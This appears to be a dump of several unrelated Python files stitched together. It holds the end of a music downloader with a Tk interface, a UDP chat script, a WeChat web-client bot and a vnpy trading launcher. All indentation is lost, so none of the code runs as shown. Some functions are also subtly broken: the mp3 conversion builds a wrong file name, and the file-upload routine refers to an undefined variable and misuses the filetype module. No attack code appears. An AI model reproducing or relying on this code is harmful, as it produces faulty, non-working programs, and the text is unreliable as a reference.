song_obj = json_obj["data"]["items"][0]
return (song_obj["vkey"], song_obj["filename"])
def download_qq_music(song_vkey, song_title, song_file_name):
url = QQ_music_song_dl_api.format(file_name=song_file_name, v_key=song_vkey)
if len(song_vkey) == 0:
messages_queue.append(
"❌ Failed to download from QQ, you may need to pay for it separately."
)
return ""
ext = song_file_name.split(".")[-1]
file_name = ".".join([song_title, ext])
res = requests.get(url)
with open(file_name, "wb") as f:
f.write(res.content)
return file_name
def convert_to_mp3(other_media):
# out_file = f"{".".join(other_media.split(".")[:-1])}.mp3"
out_file = ".".join(other_media.split(".")[-1]) + ".mp3"
messages_queue.append(
"Converting {origin} to {mp3}".format(origin=other_media, mp3=out_file)
)
out_bytes = subprocess.check_output(
["ffmpeg", "-i", other_media, "-c:a", "libmp3lame", "-aq", "2", out_file]
)
messages_queue.append(out_bytes)
return out_file
def try_get_file_in_qq_music(song_name, singer):
messages_queue.append("Searching on QQ Music...")
try:
music_id = search_qq_music(song_name, singer)
(song_v_key, song_file_name) = get_qq_music_dl_info(music_id)
song_file = download_qq_music(song_v_key, song_name, song_file_name)
mp3_file = ""
if len(song_file) == 0:
return None
if song_file.split(".")[-1] != "mp3":
mp3_file = convert_to_mp3(song_file)
os.remove(song_file)
return mp3_file
except Exception as e:
messages_queue.append(e)
def download_file(file_url, folder="", export_file_name=None, extension=None):
if not file_url or len(file_url) == 0:
messages_queue.append("Invalid download link.")
return None
if not extension:
extension = file_url.split(".")[-1]
if not export_file_name:
export_file_name = file_url.split("/")[-1]
file = ""
if len(folder) == 0:
file = f"{export_file_name}.{extension}"
else:
file = f"{folder}/{export_file_name}.{extension}"
if os.path.exists(file):
messages_queue.append("File already exists!")
return file
with requests.get(file_url, stream=True) as response:
# 单次请求最大值
chunk_size = 1024
# 内容总体大小
content_size = int(response.headers["content-length"])
progress = ProgressBar(
f"{export_file_name}.{extension}",
total=content_size,
unit="kb",
chunk_size=chunk_size,
run_status="Downloading",
fin_status="Download completed",
)
with open(file, "wb") as file:
for data in response.iter_content(chunk_size=chunk_size):
file.write(data)
progress.refresh(count=len(data))
return file
def slugify(value, allow_unicode=False):
messages_queue.append(
"Reformatting the file name to os-safe name. The actual audio tags are not changed."
)
# Taken from django (thanks guys!). Modified by robonxt. Supports utf-8.
# Removes spaces (turns into hyphens), dangerous file system characters (like /, \, etc) into underscores
value = str(value)
if allow_unicode:
value = unicodedata.normalize("NFKC", value).strip()
else:
value = (
unicodedata.normalize("NFKD", value)
.encode("ascii", "ignore")
.decode("ascii")
)
# value = re.sub(r'[^\w\s-]', '', value).strip().lower()
value = re.sub(r"[^\w\s-]", "_", value).strip()
return re.sub(r"[-\s]+", "-", value)
def install_lame():
ret = subprocess.check_output(["brew", "install", "lame"])
messages_queue.append(ret)
def add_poster(poster, title, artists, album, year, track, music, br):
ret = os.system("lame --version")
if ret != 0:
install_lame()
try:
params = [
"lame",
"--tt",
title,
"--ta",
artists,
"--tl",
album,
"--ty",
str(year),
"--tc",
str(track),
"--tg",
"13",
"--ti",
poster,
"-b",
str(br),
music,
]
out_bytes = subprocess.check_output(params)
messages_queue.append(out_bytes.decode("utf-8"))
if remove_file(poster):
messages_queue.append("The coverart was applied successfully.")
if remove_file(music):
messages_queue.append("Song file was downloaded successfully.")
old_file = f"{music}.{music.split('.')[-1]}"
if os.path.exists(old_file):
os.rename(old_file, music)
except Exception as e:
messages_queue.append(e)
def remove_file(file):
if os.path.exists(file):
os.remove(file)
return True
return False
def string_to_list(s):
result = []
for part in s.split(","):
if "-" in part:
a, b = part.split("-")
a, b = int(a), int(b)
result.extend(range(a, b + 1))
else:
a = int(part)
result.append(a)
return result
def get_itunes_library_path():
itunes_path = "~/Music/iTunes/iTunes Media/" "Automatically Add to iTunes"
path = os.path.expanduser(itunes_path)
ext = os.path.exists(path)
if not ext:
itunes_path = (
"~/Music/iTunes/iTunes Media/" "Automatically Add to iTunes.localized/"
)
return os.path.expanduser(itunes_path)
def main_downloader_script():
messages_queue.append("Message")
if URL_KEY.startswith("http"):
messages_queue.append("URL_KEY OK!")
pass
else:
messages_queue.append("URL_KEY BAD!!")
messages_queue.append("Useage error.")
# show_usage()
sys.exit(-1)
# print_welcome()
messages_queue.append(f"output folder path: {FOLDER_PATH_KEY}")
range_str = ""
if judge_if_playlist(URL_KEY):
download_playlist(URL_KEY, folder=FOLDER_PATH_KEY, range=range_str)
elif judge_if_album(URL_KEY):
download_album(URL_KEY, folder=FOLDER_PATH_KEY)
elif judge_if_mv(URL_KEY):
download_mv(URL_KEY, folder=FOLDER_PATH_KEY)
else:
download_music(URL_KEY, folder=FOLDER_PATH_KEY)
def judge_if_playlist(url):
if url.find("playlist") != -1:
return True
return False
def judge_if_album(url):
if url.find("album") != -1:
return True
return False
def judge_if_mv(url):
if url.find("mv") != -1:
return True
return False
def year_of_timestamp(unix_time):
return time.localtime(unix_time)[0]
class Music:
def __init__(self, title, artists, album, year, track, poster, br):
self.title = title
self.artists = ",".join(artists)
self.album = album
self.year = year
self.track = track
self.poster = poster
self.br = br
class ProgressBar(object):
def __init__(
self,
title,
count=0.0,
run_status=None,
fin_status=None,
total=100.0,
unit="",
sep="/",
chunk_size=1.0,
):
super(ProgressBar, self).__init__()
self.info = "【%s】%s %.2f %s %s %.2f %s"
self.title = title
self.total = total
self.count = count
self.chunk_size = chunk_size
self.status = run_status or ""
self.fin_status = fin_status or " " * len(self.status)
self.unit = unit
self.sep = sep
def __get_info(self):
# 【名称】状态 进度 单位 分割线 总数 单位
_info = self.info % (
self.title,
self.status,
self.count / self.chunk_size,
self.unit,
self.sep,
self.total / self.chunk_size,
self.unit,
)
return _info
def refresh(self, count=1, status=None):
self.count += count
# if status is not None:
self.status = status or self.status
end_str = "\r"
if self.count >= self.total:
end_str = "\n"
self.status = status or self.fin_status
messages_queue.append(self.__get_info())
def print_exception_solution(e):
if type(e) == ModuleNotFoundError:
messages_queue.append("Module not found.")
messages_queue.append("Modules needed:requests, json, re, os, subprocess, sys")
messages_queue.append(
'Please use "pip3 install [module]" to install the corresponding module'
)
messages_queue.append(e)
elif type(e) == TypeError:
messages_queue.append("Type Error")
messages_queue.append(e)
else:
messages_queue.append(e)
def print_welcome():
messages_queue.append("Welcome to Netease CloudMusic Downloader")
messages_queue.append(
"\t1. This tool can download most of Netease Cloud Music songs,"
)
messages_queue.append(
"\t except for separate payment songs (such as Taylor Swift)"
)
messages_queue.append(
"\t2. You can download both songs and full playlists. Just paste the url correctly."
)
messages_queue.append(
"\t3. You can download a full playlists or just some songs from a playlist."
)
messages_queue.append(
"\t4. In order to get song with coverart and song info, remember to install lame."
)
messages_queue.append("\t (you can download it on Homebrew or google it)")
messages_queue.append(
"\t resolution for MVs by default (TODO: Add MV resolution selection)"
)
messages_queue.append("\t5. You can also download MVs and download the highest")
messages_queue.append("\t6. Version: {}".format(__VERSION__))
messages_queue.append("\t7. Compilation date: {}".format(__DATE__))
messages_queue.append("\t8. Author: {}".format(__AUTHOR__))
messages_queue.append("\t8. Fixed/Modded: {}".format(__AUTHOR_MODDER__))
messages_queue.append("\t9. Translations: {}".format(__TRANSLATIONS__))
messages_queue.append(
"\tNOTE: PLEASE APPLY TO YOUR CORRESPONDING COPYRIGHT LAWS IN YOUR COUNTRY."
)
class MainWindow(ttk.Frame):
def __init__(self, master, **kwargs):
super().__init__(master, **kwargs)
self.folderpath = FOLDER_PATH_KEY
self.URLpath = ""
self.playlist = []
self.master = master
self.entryURLFrame = ttk.Frame(self)
self.URL_label = ttk.Label(self.entryURLFrame, text="URL: ")
self.entryURL = ttk.Entry(self.entryURLFrame)
self.download_button = ttk.Button(
self.entryURLFrame, text="Download", command=self.download_now
)
self.folder_button = ttk.Button(
self, text="Pick Folder", command=self.save_folder
)
self.folder_label = ttk.Label(self, text="Save to folder: " + self.folderpath)
self.output = scrolledtext.ScrolledText(self)
self.entryURLFrame.pack()
self.URL_label.pack(side=tk.LEFT)
self.entryURL.pack(side=tk.LEFT)
self.download_button.pack(side=tk.LEFT)
self.folder_button.pack()
self.folder_label.pack()
self.output.pack()
threading.Thread(target=self.get_queue, daemon=True).start()
def save_folder(self):
self.folderpath = filedialog.askdirectory()
# messages_queue.append(self.folderpath)
# messages_queue.append(self.folderpath.split("/"))
splitted_folderpath = self.folderpath.split("/")
clean_folderpath = "/".join(
[
splitted_folderpath[0],
splitted_folderpath[1],
splitted_folderpath[2],
"...",
splitted_folderpath[-2],
splitted_folderpath[-1],
]
)
self.folder_label.configure(text=f"Save to folder: {clean_folderpath}")
def download_now(self):
global URL_KEY
global FOLDER_PATH_KEY
URL_KEY = self.entryURL.get()
FOLDER_PATH_KEY = self.folderpath
threading.Thread(
target=self.run,
).start()
def run(self):
self.download_button.configure(state="disabled")
try:
main_downloader_script()
except:
pass
self.download_button.configure(state="enabled")
def get_queue(self):
while True:
if messages_queue:
self.output.insert(tk.END, messages_queue.pop(0) + "\n")
self.output.yview(tk.END)
if __name__ == "__main__":
t = MainWindow
root = None
try:
root = tk.Tk()
root.geometry("500x300")
root.resizable(False, False)
root.title("NetEaseMusic-UI")
t = t(root)
t.pack()
# root.resizable(False)
root.mainloop()
except RuntimeError:
root.destroy()
exit(0)
messages_queue.append("oops")
|
UDPChat.py
|
#########################
# udp 聊天
#########################
from threading import Thread
from socket import *
# 1. 收数据,然后打印
def receive_data():
while True:
receive_info = udpSocket.recvfrom(1024)
print(">>%s:%s" % (str(receive_info[1]), receive_info[0]))
# 2. 检测键盘,发数据
def send_data():
while True:
send_info = input("<<")
udpSocket.sendto(send_info.encode("gb2312"), (destIp, destPort))
udpSocket = None
destIp = ""
destPort = 0
def main():
global udpSocket
global destIp
global destPort
destIp = input("对方的ip:")
destPort = int(input("对方的端口:"))
udpSocket = socket(AF_INET, SOCK_DGRAM)
udpSocket.bind(("", 4567))
tr = Thread(target=receive_data)
ts = Thread(target=send_data)
tr.start()
ts.start()
tr.join()
ts.join()
if __name__ == "__main__":
main()
|
core.py
|
import contextlib
import hashlib
import json
import pathlib
import threading
import time
from dataclasses import dataclass
from io import BytesIO
import execjs
import filetype
import requests
import requests_html
from imgcat import imgcat
from PIL import Image
from retry import retry
from urlextract import URLExtract
from webot.common import (
addfailed,
addsucess,
check_path,
check_times,
error_log,
format_sunburst_city,
get_pic,
init_path,
)
from webot.conf import conf
from webot.data import *
from webot.exporter import create_json, load_worker, save_file, save_worker
from webot.log import debug, error, info, success, warning
from webot.parser import Parser
from webot.util import Device
with contextlib.redirect_stdout(None):
import pygame
@dataclass()
class Webot:
__session = requests_html.HTMLSession()
__session.headers = conf.fakeHeader
__session.cookies = requests_html.requests.utils.cookiejar_from_dict(
{
"MM_WX_NOTIFY_STATE": "1",
"MM_WX_SOUND_STATE": "1",
"mm_lang": "zh_CN",
"login_frequency": "1",
}
)
__thread_pool = {} # 任务池
__voice_pool = [] # 语音池
__is_online = True # 初始化上线
__appid = "wx782c26e4c19acffb" # appID
__encoding = None # 默认编码格式
__batch_contacts = {} # 群组信息
__person_map = {} # 通讯录转换结果
__qr_code_uuid = None # 二维码UUID
__qr_code_img = None # 二维码图片
__device_id = Device.create_device_id()
__msg_id = None # 消息id
__hot_reload = None # 热启动参数
def get(self, url, *args, **kargs):
resp = self.__session.get(url, *args, **kargs)
if not resp.status_code == 200 and resp.content:
raise AssertionError()
resp.encoding = "utf8"
return resp
def post(self, url, *args, **kargs):
resp = self.__session.post(url, *args, **kargs)
if not resp.status_code == 200 and resp.content:
raise AssertionError()
resp.encoding = "utf8"
return resp
@error_log(raise_exit=True)
def get_qrcode_uid(self):
"""
获取二维码ID
"""
resp = self.get(API_jsLogin)
self.__qr_code_uuid = Parser.get_qr_code_uuid(resp)
self.__encoding = Parser.get_encoding(resp)
@error_log()
def show_qrcode_local(self, buffer):
with pathlib.Path(API_qrcode_name).open("wb") as image:
image.write(buffer)
self.__qr_code_img = Image.open(API_qrcode_name)
self.__qr_code_img.show()
@error_log(raise_exit=True)
def get_qrcode_img(self):
"""
获取二维码
"""
resp = self.get(f"{API_qrcode}{self.__qr_code_uuid}")
Device.show_qrcode(resp.content, self.show_qrcode_local)
@error_log()
def get_base_request(self):
"""
获取基础请求信息
"""
base_request = {
"BaseRequest": {
"Uin": self.__auth_data["wxuin"],
"Sid": self.__auth_data["wxsid"],
"Skey": self.__auth_data["skey"],
"DeviceID": Device.create_device_id(),
}
}
return base_request
@error_log()
def create_synckey(self):
"""
组合生成synckey
"""
synckey = "|".join(
[
f"{item['Key']}_{item['Val']}"
for item in self.__person_data["SyncKey"]["List"]
]
)
debug(f"Synkey:[{synckey}]")
return synckey
@retry()
@error_log(raise_err=True)
def login_wait(self, local=None):
"""
登录过程
"""
return self.get(
API_login if local else API_check_login,
params={
"loginicon": "true",
"uuid": self.__qr_code_uuid,
"tip": 1 if local else 0,
"r": Device.get_timestamp(True),
"_": Device.get_timestamp(),
},
timeout=API_checktimeout,
)
@error_log(raise_err=True)
def login_push_wait(self):
"""
短时热启动
"""
self.__session.cookies.update(
requests_html.requests.utils.cookiejar_from_dict({"login_frequency": "2"})
)
resp = self.get(
API_webwxpushloginurl, params={"uin": self.__session.cookies.get("wxuin")}
)
self.__qr_code_uuid = resp.json()["uuid"]
info(f"New UUID: [{self.__qr_code_uuid}]")
return True
def login_localwait(self):
"""
等待本地终端扫描
"""
warning("Waiting for app scan")
self.login_wait(True)
if self.__qr_code_img:
self.__qr_code_img.fp.close()
@error_log(raise_err=True)
def login_appwait(self, get_ticket=True):
"""
等待本地终端确认
"""
warning("Waiting for app confirm")
resp = self.login_wait(False)
if get_ticket:
success("Login Success")
self.__get_ticket_url = Parser.get_get_ticket_url(resp)
@error_log()
def get_ticket(self):
"""
获取个人信息票据并更新部分cookie
"""
info(f"Redirect to --> {self.__get_ticket_url}")
resp = self.get(
self.__get_ticket_url,
params={"fun": "new", "lang": "zh_CN", "_": Device.get_timestamp()},
)
info(
f"Get Ticket:{requests_html.requests.utils.dict_from_cookiejar(resp.cookies)}"
)
self.__auth_data = Parser.get_auth_data(resp)
self.__session.cookies.update(
requests_html.requests.utils.cookiejar_from_dict(
{"last_wxuin": self.__auth_data["wxuin"]}
)
)
if list(filter(lambda item: item[1], self.__auth_data.items())):
return True
def login(self):
"""
获取认证数据
"""
if self.__hot_reload and check_path(API_hotreload_file):
try:
(
self.__session,
self.__auth_data,
self.__person_data,
self.__get_ticket_url,
) = load_worker(API_hotreload_file)
# self.login_push_wait()
# self.login_appwait(False)
except Exception:
error("Hot reload timeout!")
self.__hot_reload = False
self.login()
else:
self.get_qrcode_uid()
self.get_qrcode_img()
self.login_localwait()
self.login_appwait()
@error_log()
def login_success_init(self):
"""
成功登陆并初始化wx
"""
resp = self.post(
API_webwxinit,
params={"pass_ticket": self.__auth_data["pass_ticket"], "lang": "zh_CN"},
json=self.get_base_request(),
)
resp.encoding = "utf8"
self.__person_data = resp.json()
self.__nick = self.__person_data["User"]["NickName"]
conf.my_id = self.__person_data["User"]["UserName"]
create_json(self.__person_data, API_static_path / "person_data.json")
success(
f"{'Welcome'.center(20,'*')}: [{self.__person_data['User']['NickName']}]"
)
save_worker(
(
self.__session,
self.__auth_data,
self.__person_data,
self.__get_ticket_url,
),
API_hotreload_file,
)
@error_log()
def get_msg_id(self):
"""
获取消息身份id
"""
jsondata = self.get_base_request()
jsondata.update(
{
"Code": 3,
"FromUserName": self.__person_data["User"]["UserName"],
"ToUserName": self.__person_data["User"]["UserName"],
"ClientMsgId": Device.create_client_msg_id(),
}
)
resp = self.post(
API_webwxstatusnotify,
params={"lang": "zh_CN", "pass_ticket": self.__auth_data["pass_ticket"]},
json=jsondata,
)
self.__msg_id = resp.json()["MsgID"]
def get_msg_signal(self):
"""
消息信号检查
"""
call_back = {"retcode": "0", "selector": "0"}
try:
resp = self.get(
API_synccheck,
params={
"r": Device.get_timestamp(),
"skey": self.__auth_data["skey"],
"sid": self.__auth_data["wxsid"],
"uin": self.__auth_data["wxuin"],
"deviceid": self.__device_id,
"synckey": self.create_synckey(),
"_": Device.get_timestamp(),
},
timeout=API_checktimeout,
)
if not resp.status_code == 200:
raise AssertionError()
call_back = execjs.eval(resp.text.replace("window.synccheck=", ""))
except requests.exceptions.ReadTimeout:
pass
except requests.exceptions.Timeout:
pass
except Exception as e:
error(e)
time.sleep(1)
return call_back
@retry()
@error_log(raise_exit=True)
def get_msg_contents(self):
"""
获取消息详情
"""
jsondata = self.get_base_request()
jsondata.update(
{"rr": execjs.eval("~new Date"), "SyncKey": self.__person_data["SyncKey"]}
)
resp = self.post(
API_webwxsync,
params={
"lang": "zh_CN",
"sid": self.__auth_data["wxsid"],
"skey": self.__auth_data["skey"],
"pass_ticket": self.__auth_data["pass_ticket"],
},
json=jsondata,
)
resp.encoding = "utf8"
res = resp.json()
self.__person_data["SyncKey"] = res["SyncKey"]
return res
@error_log(raise_exit=True)
def get_contact(self):
"""
获取基础联系人
"""
resp = self.get(
API_webwxgetcontact,
params={
"lang": "zh_CN",
"pass_ticket": self.__auth_data["pass_ticket"],
"r": Device.get_timestamp(),
"seq": 0,
"skey": self.__auth_data["skey"],
},
)
self.__contacts = resp.json()
create_json(self.__contacts, API_static_path / "contacts.json")
info(f"Get friends: [{self.__contacts['MemberCount']}]")
@error_log()
def get_batch_contact(self, contact_list: list = None):
"""
获取群组联系人
"""
debug("Updating batch contacts")
if not contact_list:
contact_list = self.__person_data["ChatSet"].split(",")
debug(f"contact targets[{len(contact_list)}]")
contact_list = list(
filter(lambda name: name not in self.__person_map, contact_list)
)
debug(f"contact filter result[{len(contact_list)}]")
if not contact_list:
return
for contact_list in [
{"UserName": item, "EncryChatRoomId": ""}
for item in contact_list
if "@@" in item
]:
contact_list = [contact_list]
jsondata = self.get_base_request()
jsondata.update({"Count": len(contact_list), "List": contact_list})
resp = self.post(
API_webwxbatchgetcontact,
params={
"type": "ex",
"r": Device.get_timestamp(),
"lang": "zh_CN",
"pass_ticket": self.__auth_data["pass_ticket"],
},
json=jsondata,
)
self.__batch_contacts.update(resp.json())
self.__person_map = Device.trans_map(self.__contacts, self.__batch_contacts)
debug(f"current contacts[{len(self.__person_map)}]")
create_json(self.__batch_contacts, API_static_path / "batch_contacts.json")
@error_log()
def get_image(self, msg_id, play=False):
"""
获得视频数据
"""
resp = self.get(
API_webwxgetmsgimg,
params={"msgid": msg_id, "skey": self.__auth_data["skey"]},
)
if play:
imgcat(resp.content)
return resp.content
@error_log()
def get_voice(self, msg_id, play=False):
"""
获得语音数据
"""
resp = self.get(
API_webwxgetvoice,
params={"msgid": msg_id, "skey": self.__auth_data["skey"]},
)
if play:
self.__voice_pool.insert(0, BytesIO(resp.content))
return resp.content
@error_log()
def get_video(self, msg_id, play=False):
"""
获得视频数据
"""
# self.get_image(msg_id, play)
content = BytesIO()
for item in self.__session.get(
API_webwxgetvideo,
params={"msgid": msg_id, "skey": self.__auth_data["skey"]},
headers={"Range": "bytes=0-"},
stream=True,
).iter_content():
content.write(item)
if play:
pass
return content.getvalue()
def check_online_status(self):
"""
检查在线状态
"""
try:
while True:
if not self.__is_online:
warning("ready for logout")
for name, threadTarget in self.__thread_pool.items():
debug(f"{name} closed!")
threadTarget.join()
success("end!")
exit()
time.sleep(1)
except Exception:
self.__is_online = False
@error_log()
def send_text(self, target, msg):
"""
文本消息发送
"""
jsondata = self.get_base_request()
LocalID = str(execjs.eval("+new Date()"))
jsondata.update(
{
"Msg": {
"Type": 1,
"Content": msg,
"FromUserName": self.__person_data["User"]["UserName"],
"ToUserName": target,
"LocalID": LocalID,
"ClientMsgId": LocalID,
},
"Scene": 0,
}
)
fakeHeader = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Content-Type": "application/json;charset=UTF-8",
"Host": "wx.qq.com",
"Origin": "https://wx.qq.com",
"Referer": "https://wx.qq.com/?&lang=zh_CN",
"User-Agent": "Webot/1.0",
}
resp = self.post(
API_webwxsendmsg,
params={"lang": "zh_CN", "pass_ticket": self.__auth_data["pass_ticket"]},
data=json.dumps(jsondata, ensure_ascii=False).encode("utf-8"),
headers=fakeHeader,
)
warning(self.translate_text(f"🤖️->【{target}】: {msg}"))
debug(resp.json())
@error_log()
def send_file(self, target, filename):
"""
文本文件发送
"""
with pathlib.Path(filename).open("rb") as file:
datas = file.read()
lens = len(datas)
self.post(
API_webwxuploadmedia,
params={"f": "json"},
json={
"id": "WU_FILE_0",
"name": filename,
"type": filetype(BytesIO(data)).mime,
"lastModifiedDate": "Tue May 21 2019 00:00:00 GMT 0800 (中国标准时间)",
"size": lens,
"mediatype": "pic",
"uploadmediarequest": {
"UploadType": 2,
"BaseRequest": self.get_base_request(),
"ClientMediaId": Device.get_timestamp(),
"TotalLen": lens,
"StartPos": 0,
"DataLen": lens,
"MediaType": 4,
"FromUserName": self.__person_data["User"]["UserName"],
"ToUserName": target,
"FileMd5": hashlib.new("md5", datas).hexdigest(),
},
"webwx_data_ticket": self.__session.cookies.get(
"webwx_data_ticket", ""
),
"pass_ticket": self.__auth_data["pass_ticket"],
"filename": datas,
},
headers={
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryrUwfuyA8mLqHyBJP",
"DNT": "1",
"Origin": "https://wx.qq.com",
"Referer": "https://wx.qq.com/",
"User-Agent": "Webot/1.0",
},
)
def search_friend(self, strs):
"""
好友搜索
"""
for index, value in enumerate(self.__contacts["MemberList"]):
if strs in value["NickName"]:
print(
f"[{index}]{value['NickName'].ljust(4)}{value['UserName'].rjust(10)}"
)
def index_friend(self, hashid):
"""
好友索引
"""
for value in self.__contacts["MemberList"]:
if hashid == value["UserName"]:
return value
return {}
def msg_worker(self):
"""
消息处理
"""
debug("start msg worker")
def worker():
debug("start main loop")
while True:
try:
sync_check_res = self.get_msg_signal()
debug(f"sync_check_res: {sync_check_res}")
retcode, selector = (
sync_check_res["retcode"],
sync_check_res["selector"],
)
if retcode == "0" and int(selector) > 0:
msgs = self.get_msg_contents()
debug(f"Contents: {msgs}")
for msg in msgs["AddMsgList"]:
_, result = self.data_ctrl(msg)
self.send_back(result)
elif retcode == "1101":
self.__is_online = False
warning("main loop offline")
return
except KeyboardInterrupt:
return
except Exception as e:
error(e)
finally:
time.sleep(0.1)
def interaction():
"""
简单交互式面板
"""
debug("start isnteraction")
while True:
if not self.__is_online or not conf.need_interaction:
warning("isnteraction offline")
return
try:
cmd = input(">>>")
if not cmd:
pass
else:
print(eval(cmd))
except Exception as e:
error(e)
finally:
time.sleep(0.1)
def voice():
"""
语音消息
"""
debug("start voice detector")
pygame.mixer.init()
while True:
if not self.__is_online:
warning("voice detector offline")
return
while self.__voice_pool:
pygame.mixer.music.load(self.__voice_pool.pop())
pygame.mixer.music.play()
time.sleep(2)
def trystart(item):
try:
item.start()
except Exception as e:
error(e)
self.__thread_pool["msg_hook"] = threading.Thread(target=worker)
self.__thread_pool["voice_hook"] = threading.Thread(target=voice)
self.__thread_pool["interaction"] = threading.Thread(target=interaction)
list(map(lambda item: trystart(item[1]), self.__thread_pool.items()))
self.check_online_status()
def msg_is_self(self, target):
return target["FromUserName"] == self.__person_data["User"]["UserName"]
@error_log()
def data_ctrl(self, msg):
"""
打印基础消息并整理
"""
msg_type = msg["MsgType"]
sub_type = msg["SubMsgType"]
is_me = self.msg_is_self(msg)
is_group = "@@" in msg["FromUserName"]
content_header = "👥" if is_group else "💬"
to_user_name = "" if is_group else f'-> 【{msg["ToUserName"]}】'
func = info if is_me else success
content = f'{content_header}【{msg["FromUserName"]}】{to_user_name}:'
create_json(msg, str(API_static_path / "⚡️current_msg.json")) # 实时日志分析
result = {
"time": msg["CreateTime"],
"from": msg["FromUserName"],
"from_nick": self.translate_text(msg["FromUserName"]),
"to": msg["ToUserName"],
"to_nick": self.translate_text(msg["ToUserName"]),
"type": MSG_TYPES[msg_type].lower(),
"content": "",
"raw_content": msg["Content"],
"is_me": is_me,
"is_group": is_group,
}
self.get_batch_contact([msg["FromUserName"],msg["ToUserName"]])
number = f"{result['time']}_{result['from_nick']}_{msg['MsgId']}" # 消息编号
if msg_type == MSGTYPE_TEXT:
if sub_type == 0:
result["content"] = msg["Content"]
elif sub_type == 48:
result["content"] = msg["Content"].split(":")[0]
self.on_text(result)
elif msg_type == MSGTYPE_VOICE:
voice = self.get_voice(msg["MsgId"], conf.play_voice)
filename = str(API_meida_voice_path / f"{number}.mp3")
save_file(voice, filename)
result["content"] = filename
self.on_voice(result)
elif msg_type == MSGTYPE_VIDEO:
video = self.get_video(msg["MsgId"], True)
filename = str(API_meida_video_path / f"{number}.mp4")
save_file(video, filename)
result["content"] = filename
self.on_video(result)
elif msg_type == MSGTYPE_IMAGE:
image = self.get_image(msg["MsgId"], True)
filename = str(API_meida_image_path / f"{number}.png")
save_file(image, filename)
result["content"] = filename
self.on_image(result)
elif msg_type == MSGTYPE_EMOTICON:
urls = URLExtract().find_urls(msg["Content"])
if not urls:
return
filename = str(API_meida_emoji_path / f"{number}.png")
imgcat(get_pic(self.__session, urls[0], filename))
result["content"] = urls[0]
self.on_emoji(result)
elif msg_type == MSGTYPE_APP:
pass
# content += "公众号推送"
elif msg_type == MSGTYPE_STATUSNOTIFY:
# content += "进入/退出"
pass
if msg_type not in [] and result["content"]:
func(self.translate_text(content + result["content"]))
return msg, result
def on_text(self, msg):
pass
def on_video(self, msg):
pass
def on_voice(self, msg):
pass
def on_image(self, msg):
pass
def on_emoji(self, msg):
pass
def revice(self, msg):
pass
def send_back(self, msg):
pass
# """
# 自动回复
# """
# if not target:
# target = msg["FromUserName"]
# else:
# try:
# target = list(
# filter(lambda item: item[1] == target, self.__person_map.items())
# )[0][0]
# except Exception as e:
# print(e)
# if target in [
# self.__person_data["User"]["UserName"],
# self.__person_data["User"]["NickName"],
# ]: # 判断是否为自己
# return
# if "@@" in target and not groups: # 判断是否为群组
# return
# if "gh_" == self.index_friend(target).get("KeyWord", ""): # 判断是否为公众号
# return
# content = msg["Content"].replace(YOUR_NAME, "你") # 反骂功能
# msg_type = msg["MsgType"]
# if msg_type == MSGTYPE_TEXT:
# self.send_msg(target, content)
# def filter_msg(self)
def translate_text(self, words):
"""
美化消息
"""
for k, v in self.__person_map.items():
words = words.replace(k, v)
return words
@error_log()
def run_add_on(self):
debug("check add on")
if conf.export_xlsx:
Device.export_all_contact(
self.__contacts, self.__session, self.__person_data
)
if conf.make_icon_wall:
Device.make_icon_wall(
API_media_icon_path,
API_analysis_path / f"{self.__nick}_icon_wall.png",
patterns="*_0",
)
if conf.sunburst_city:
Device.export_sunburst_city(
self.__contacts, API_analysis_path / f"{self.__nick}_sunburst_city.html"
)
@error_log(raise_exit=True)
def run(
self,
hot_reload=None,
export_xlsx=None,
sunburst_city=None,
make_icon_wall=None,
debug=None,
interaction=None,
):
if hot_reload != None:
self.__hot_reload = bool(hot_reload)
if export_xlsx != None:
conf.export_xlsx = bool(export_xlsx)
if sunburst_city != None:
conf.sunburst_city = bool(sunburst_city)
if make_icon_wall != None:
conf.make_icon_wall = bool(make_icon_wall)
if debug != None:
conf.debug = bool(debug)
if interaction != None:
conf.need_interaction = bool(interaction)
self.login()
while not self.get_ticket():
self.__hot_reload = False
self.login()
self.login_success_init()
self.get_msg_id()
self.get_contact()
self.get_batch_contact()
self.run_add_on()
self.msg_worker()
if __name__ == "__main__":
Webot().run()
|
runCtaTrading.py
|
import multiprocessing
import os
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG, EVENT_ERROR
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import okexGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
def findConnectKey():
files=os.listdir(".")
for file in files:
if file.find("_connect.json")>=0:
return file.replace("_connect.json","")
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print('-'*30)
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
# le.addConsoleHandler()
# le.addFileHandler()
le.info(u'启动CTA策略运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(okexGateway)
me.addApp(ctaStrategy)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
le.info(u'注册日志事件监听')
KEY = findConnectKey()
me.connect(KEY)
le.info(u'连接行情和交易接口')
sleep(5) # 等待接口初始化
me.dataEngine.saveContracts() # 保存合约信息到文件
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
cta.initAll()
cta.startAll()
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
le.info(u'启动CTA策略守护父进程')
DAY_START = time(8, 45) # 日盘启动和停止时间
DAY_END = time(15, 30)
NIGHT_START = time(20, 45) # 夜盘启动和停止时间
NIGHT_END = time(2, 45)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runChildProcess() # 7*24 全时段无人值守
